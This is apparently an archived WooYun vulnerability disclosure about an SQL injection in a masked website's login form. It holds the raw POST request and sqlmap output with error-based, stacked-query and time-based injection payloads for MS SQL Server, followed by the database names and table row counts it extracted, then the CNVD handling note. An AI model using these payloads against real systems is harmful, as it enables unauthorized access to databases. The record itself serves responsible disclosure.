乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
rt
POST /index.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://**.**.**.**/index.aspCookie: ASPSESSIONIDASCRTDQR=FKKHDDOAKOMAPIBGLJCDJHKEConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 44username=123456&userpass=1&B1=%B5%C7++%C2%BC
登陆处
sqlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=123456' AND 8202=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(122) CHAR(107) CHAR(113) (SELECT (CASE WHEN (8202=8202) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(107) CHAR(106) CHAR(113) CHAR(113))) AND 'VCxj'='VCxj&userpass=1&B1=%B5%C7 %C2%BC Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: username=123456';WAITFOR DELAY '0:0:5'--&userpass=1&B1=%B5%C7 %C2%BC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: username=123456' WAITFOR DELAY '0:0:5'--&userpass=1&B1=%B5%C7 %C2%BC---[12:10:52] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000[12:10:52] [INFO] fetching database names[12:10:53] [INFO] heuristics detected web page charset 'GB2312'[12:10:53] [INFO] the SQL query used returns 11 entries[12:10:55] [INFO] fetching number of databases[12:10:55] [WARNING] time-based comparison requires larger statistical model, please wait..................[12:11:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y11[12:11:24] [INFO] retrieved:[12:11:30] [INFO] adjusting time delay to 4 seconds due to good response times5287835[12:13:19] [INFO] retrieved: ERP[12:14:04] [INFO] retrieved: master[12:15:41] [INFO] retrieved: model[12:17:12] [INFO] retrieved: msdb[12:18:19] [INFO] retrieved: Northwind[12:21:11] [INFO] retrieved: pubs[12:22:25] [INFO] retrieved: tempdb[12:24:14] [INFO] retrieved: whdata[12:25:55] [INFO] retrieved: whqsi[12:27:22] [INFO] retrieved: xxsgddzavailable databases [11]:[*] 5287835[*] ERP[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] whdata[*] whqsi[*] xxsgddz
Database: whqsi+--------------------+---------+| Table | Entries |+--------------------+---------+| dbo.tm | 248136 || dbo.nj_jgdm | 32433 || dbo.[nj_jgdm---] | 29566 || dbo.xtcy_nj | 27784 || dbo.xtcy | 14872 || dbo.xtcy_chanpin | 13941 || dbo.nj_px | 9495 || dbo.xtcy070110 | 6600 || dbo.nj_ebank | 3868 || dbo.nj_zycp | 2924 || dbo.nj_user | 2768 || dbo.xjjhy | 1199 || dbo.nj_jjhy | 1047 || dbo.spbq | 493 || dbo.nj_gj | 237 || dbo.nj_info | 96 || dbo.nj_net | 96 || dbo.nj_hb | 34 || dbo.nj_jjlx | 30 || dbo.sysconstraints | 15 || dbo.nj_jglx | 12 || dbo.dtproperties | 9 || dbo.nj_xzqh | 6 || dbo.tm_user | 6 || dbo.nj_b2b | 5 || dbo.syssegments | 3 |+--------------------+---------+
危害等级:中
漏洞Rank:9
确认时间:2015-12-04 10:40
CNVD确认所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无